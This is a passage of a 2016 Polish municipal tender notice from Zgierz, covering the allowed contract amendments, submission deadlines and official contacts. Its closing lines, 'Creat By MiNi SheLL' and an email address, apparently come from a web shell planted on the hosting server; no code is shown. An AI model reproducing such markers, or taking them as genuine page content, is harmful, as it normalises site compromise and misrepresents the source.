                   rozliczeń lub płatności do wymogów zmienionej umowy o dofinansowanie projektu 
                  lub  nowych wytycznych dotyczących realizacji  projektu,
             f) rezygnacją przez Zamawiającego z realizacji części przedmiotu umowy, przy czym
                   zmiany mogą dotyczyć zakresu wykonywanych prac, zmian dokumentacji 
                   i zmniejszenia wynagrodzenia o kwoty odpowiadające cenie prac, z których Zamawiający
                  zrezygnuje,
      g)   zmianą uzasadnioną okolicznościami, o których mowa w art. 357 ze znaczkiem 1 Kodeksu cywilnego,
      h)   innymi okolicznościami prawnymi, ekonomicznymi lub technicznymi, skutkującymi niemożnością 
            wykonania lub należytego wykonania umowy zgodnie z SIWZ.  
 5. Zamawiający przewiduje również możliwość dokonania takich zmian postanowień zawartej umowy, jak: 
               a)  zmiana w harmonogramie prac,
               b) zmiany kluczowego personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego
                     wyrażoną na piśmie,
               c)   zmiany Podwykonawców,
               d)   przyjęcia Podwykonawców w trakcie realizacji zamówienia
                e) zmiany danych Wykonawcy, np. zmiana adresu, konta bankowego, nr Regon, osób 
                     kontaktowych, itp.
6. Na wypadek wniesienia przez organ sprzeciwu, Zamawiający przewiduje możliwość ograniczenia zakresu 
   rzeczowego zamówienia (dotyczy urządzenia miejsc parkingowych przed budynkiem Cechu przy Alei Armii
    Krajowej).

7. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę,
    ale nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.umz.zgierz.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgierza, 95-100 Zgierz, plac Jana Pawła II 16, pokój nr 219.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2016 godzina 12:45, miejsce: Urząd Miasta Zgierza, 95-100 Zgierz, plac Jana Pawła II 16, BIURO OBSŁUGI KLIENTA (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 13.09.2016.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: - w sprawach merytorycznych: 1) Alina Zawadzka, inspektor, pok. nr 206, tel.: (42)714-32-30, 2) Ewa Lefik-Babiasz, z-ca naczelnika, pok. nr 207, tel.: (42)714-31-12, - w sprawach proceduralnych: 1) Ewa Stasiak, gł. specjalista i 2) Lech Dąbski, naczelnik, pok. 219, tel.: (42) 714-32-00 oraz 3) Agnieszka Sobczak, inspektor, pok. 220, tel.: (42) 714-32-34. Postępowanie o udzielenie zamówienia prowadzi się z zachowaniem formy pisemnej. Zamawiający dopuszcza, aby oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane były przez Wykonawców i Zamawiającego nie tylko w podstawowej formie pisemnej, ale również faksem albo pocztą elektroniczną, przy czym: a) jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem albo pocztą elektroniczną - każda ze Stron, na żądanie drugiej, zobowiązana jest niezwłocznie potwierdzić fakt ich otrzymania; b) w przypadku zastosowania przez Wykonawcę elektronicznej formy porozumiewania się z Zamawiającym - zaleca się telefoniczne uprzedzenie Zamawiającego o takim zamiarze na numer: (42) 71 43 200.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com